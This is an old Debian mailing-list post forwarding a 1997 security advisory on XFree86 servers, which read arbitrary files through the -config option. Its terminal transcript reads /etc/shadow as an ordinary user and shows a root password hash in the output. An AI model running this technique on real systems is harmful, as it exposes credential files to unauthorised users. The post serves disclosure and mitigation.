[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

XFree86 insecurity (fwd)

Anyone know if debian is vulnerable to this, given that the setuid
/usr/X11R6/bin/X is a wrapper for the XFree86 server?

I'd like to know before I chmod u-s /usr/X11R6/bin/X...



---------- Forwarded message ----------
From: shegget <root@SHEGG.RH1.IIT.EDU>
Date: Fri, 21 Nov 1997 18:35:36 +0000
Subject: XFree86 insecurity

                  plaguez security advisory n.10

                        XFree86 insecurity

Program:   XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)

Version:   Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
           Other versions as well.

OS:        All

Impact:    The XFree86 servers let you specify an alternate configuration
           file and do not check whether you have rights to read it.
           Any user can read files with root permissions.

just a short one to tell you about this "feature" I found in all default
XFree86 servers...

Here it is:

Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/fr-latin1.map
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw-------   1 root     bin          1039 Aug 21 20:12  /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a #                   mouse acceleration (pixels)
-ac                    disable access control restrictions
-audit int             set audit trail level
-auth file             select authorization file
bc                     enable bug compatibility
-bs                    disable any backing store support
-c                     turns off key-click

... and so on.  HINT: look at the first XF86_SVGA output line.


If you run xdm, you should consider removing the setuid bit of the

If not, well, wait for the XFree86 Project to bring you a patch, since I'm
too lazy to find and fix it.



TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-user-request@lists.debian.org . 
Trouble?  e-mail to templin@bucknell.edu .

Reply to: